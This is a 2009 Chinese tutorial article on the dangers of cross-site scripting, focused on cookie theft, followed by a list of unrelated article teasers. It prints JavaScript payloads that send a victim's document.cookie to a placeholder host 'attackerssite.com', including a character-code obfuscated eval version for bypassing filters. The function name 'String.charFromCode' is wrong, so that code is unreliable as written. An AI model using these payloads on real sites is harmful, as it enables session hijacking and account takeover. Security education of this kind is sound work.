跨站脚本攻击深入解析:跨站危害及cookie盗窃
作者:康凯 来源:asp之家 发布时间:2009-12-24 17:12:00
跨站脚本的名称源自于这样一个事实,即一个Web 站点(或者人)可以把他们的选择的代码越过安全边界线注射到另一个不同的、有漏洞的Web 站点中。当这些注入的代码作为目标站点的代码在受害者的浏览器中执行时,攻击者就能窃取相应的敏感数据,并强迫用户做一些用户非本意的事情。
在本文的上篇中,我们详细介绍了跨站脚本漏洞利用的过程,并对HTML注入进行深入分析;而本文将详细介绍跨站脚本的危害,以及攻击者是如何诱骗受害者的;最后介绍针对跨站脚本攻击的防御措施。
一、跨站脚本的危害
XSS是一种对Web应用程序的用户发动的攻击,利用它攻击者能装扮成被攻击的用户来完全控制Web应用程序,即便Web应用程序位于一个防火墙之后并且攻击者无法直接接触该Web应用程序也是如此。XSS一般不会对用户的机器造成损害,也不会对Web应用程序服务器直接造成破坏。如果成功,攻击者可以做三种事情:
窃取Cookie
在受害用户面前假冒成Web应用程序
在Web应用程序面前假冒成受害用户
二、窃取Cookie
Cookie一般控制着对Web应用程序的访问,如果攻击者偷窃了受害用户的Cookie,那么攻击者就可以使用受害者的Cookie来完全控制受害者的帐户。对于Cookie来说,其最佳实践就是让它在一段时间后过期,这样的话攻击者就只能在有限的时间内访问受害者的帐户。可以利用下面的代码来窃取Cookie:
var x=new Image();x.src=‘http://attackerssite.com/eatMoreCookies?c=’+document.cookie;
或者像下面这样:
document.write(“〈 img src=‘http://attackerssite.com/eatMoreCookies”+“?c=”+document.cookie+“’〉”);
如果某些字符是禁止的,则将其转换为ASCII的十进制数,然后使用JavaScript的String.charFromCode()函数即可。下列JavaScript等价于前面的JavaScript:
以下为引用的内容:
eval(String.charFromCode(118,97,114,32,120,61,110,101,119,32,73,109,
97,103,101,40,41,59,120,46,115,114,99,61,39,104,116,116,112,58,47,47,
97,116,116,97,99,107,101,114,115,115,105,116,101,46,99,111,109,47,
101,97,116,77,111,114,101,67,111,111,107,105,101,115,63,99,61,39,43,
100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59));
猜你喜欢
- 虽然现在的站长界,无论是个人站还是门户站,都或多或少的用了“采集”的方式来建站,比如猫扑这个看起来不至于用采集的“大站”,而众多的个人网站就
- 在虚拟机上新安装了一个根据开源Chromium源码编译好的Chrome OS镜像文件进行试用测试,颇有一些感慨。Chrome OS省去了其他
- 本修改经过多次测试在 大部分国外空间都安装正常。如果不会修改的,请下载我提供的dedecms5.1UTF-8英文版本 文章模块。已经修改好的
- 了解缓存中毒攻击近来,网络上出现史上最强大的互联网漏洞——DNS缓存漏洞,此漏洞直指我们应用中互联网脆弱的安全系统,而安全性差的根源在于设计
- 一、安装POP3和SMTP服务组件Windows Server 2003默认情况下是没有安装POP3和SMTP服务组件的,因此我们要手工添加
- 如题,我的网站是新开的网站,网站的域名也没有任何记录的新域名。如果大家不相信,就可以新去站长网的站长工具栏目查看下我的域名注册信息,我的域名
- 百度site:首页出现"访问本页面,您的浏览器需要支持JavaScript".这样的情况,对于一个刚刚引起搜索引擎重视的
- WordPress系统本身,默认安装的情况下使用默认模板,实际上对搜索引擎并不友好,并没有针对搜索引擎进行很好的设计,下面我介绍一些技巧和方
- 北京时间10月22日消息,据国外媒体报道,美国股东劳伦斯·格拉泽(Lawrence Glaser)今天向位于曼哈顿的地方法院起诉了九城(Na
- W3C网页设计标准是一种技术也是一种思想。现在基本上很多高端的客户都会要求按照W3C标准来设计网站。在今年和去年这两年时间里,国内很多的门户
- 个人认为一个站点要运营成功的有这么几个要素(从客户访问网站的角度)。我们可以模拟客户游历网站的过程,一个客户在网上游历,偶然中通过搜索引擎或
- 但不论你采用哪一种方法,有一件事是都需要做的,那就是创造一个虚拟的系统环境。以下简单列出如何在"/vs"这个目录下,创造
- 打开:hack/bank/index.php查找:$pages = numofpage($rt['sum'
- All-in-One的Mac平台WEB服务器4DWebSTARV是一款MAC平台的多功能服务器软件包,它包含了WEB,FTP,WebdAV和
- 对于遭受DDOS攻击的情况是让人很尴尬的,如果我们有良好的DDoS防御方法,那么很多问题就将迎刃而解,我们来看看我们有哪些常用的有效地方法来
- 1.代朋友问一下。 以前因为对政策不了解。 冒然做GG广告,被K了GG广告账户。 现在想"重新做人"。 可以么?有什么办
- 博客评论投票是一个常见的功能,如果对某网友的评论比较认同,那么可以对其进行“支持”投票。如果感觉评论内容不好,不同意其观点,可以对其投“反对
- IDC首席分析师预计到2012年,美国云计算总开支将达到400亿美元,是2008年的3倍。面对这个巨大的利益诱惑,谷歌等IT企业早已跃跃欲试
- 北京时间10月12日消息,据国外媒体报道,美国投资公司Pali Capital周一发布投资者报告称,盛大网络(Nasdaq:SNDA)股价具
- 侧边栏的标签云(Tag Cloud)一直是 WordPress 2.3+ 以后的内置功能,一般直接调用函数 wp_tag_cloud 或者在